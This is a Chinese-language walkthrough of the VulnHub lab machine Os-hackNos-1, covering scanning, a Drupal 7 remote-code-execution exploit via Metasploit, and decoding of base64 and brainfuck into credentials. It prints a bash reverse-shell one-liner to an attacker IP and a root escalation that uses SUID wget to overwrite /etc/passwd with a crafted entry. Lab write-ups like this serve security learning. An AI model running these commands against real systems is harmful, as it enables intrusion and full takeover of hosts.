vulnhub靶機Os-hackNos-1
信息搜集
nmap -sP 192.168.114.0/24
找到開放機器192.168.114.140這台機器,再對這台靶機進行端口掃描。
這里對他的端口開放進行掃描,看一下他的端口開放服務。
nmap -sV -A -p 1-65535 192.168.114.140
看一下具體網頁發現是個apache的網頁。
經過dirb進行目錄的爆破,發現這么一個目錄http://192.168.114.140/drupal/,它的下面還有一些子目錄,訪問是一個登錄界面。
這個時候就可以開始查指紋了,用 wappalyzer這個插件,或者是whatweb以及在線網站都可以。
看到了具體的版本號:Apache 2.4.18,drupal7
到msf下看看有沒有什么能夠利用的漏洞。
發現一個18年的遠程命令執行漏洞,而且在msf上他的評級是excellent。
常規方法利用,獲取到了一個session會話,但是執行不了命令,進入到shell。
將Shell轉換成為交互式的TTY:python3 -c "import pty;pty.spawn('/bin/bash')"
進入網站根目錄:
發現alexander.txt文件。
得到遺傳base64密文,解碼得到以船奇怪的東西,感覺有點像以前的jsfuck,放控制台沒結果,那應該不是了
+++++ +++++ [->++ +++++ +++<] >++++ ++.-- ----- --.<+ ++[-> +++<] >+++.
----- ---.< +++[- >+++< ]>+++ ++.<+ +++++ +[->- ----- -<]>- ----- --.<+
++[-> +++<] >++++ +.<++ +++[- >++++ +<]>. ++.++ +++++ +.--- ---.< +++[-
>+++< ]>+++ +.<++ +++++ [->-- ----- <]>-. <+++[ ->--- <]>-- -.+.- ---.+
++.<
隨便截取一段,百度一下,百度,永遠滴神!
發現是brainfuck,一種摩爾編碼。
https://www.splitbrain.org/services/ook
解碼:james:Hacker@4514
因為22端口開着的,所以嘗試登陸沒成功。
繼續准備提權,查看suid程序。
嫌棄他操作不方便反彈了一下shell。
bash -i >& /dev/tcp/192.168.114.128/2333 0>&1
看到wget,可以進行提權。
具體思路是:利用wget,增加一個root權限用戶
再kali端生成一個賬號為admin123,密碼為111111的賬號。
$1$admin$2WRLhTGcIMgZ7OhwCpREK1
改格式:
admin123:$1$admin$2WRLhTGcIMgZ7OhwCpREK1:0:0::/root:/bin/bash
放到網站目錄下,然后利用gwget進行保存,讓他覆蓋掉/etc/passwd。
su admin123進行登錄,一切就ok了,我們成功實現了提權。
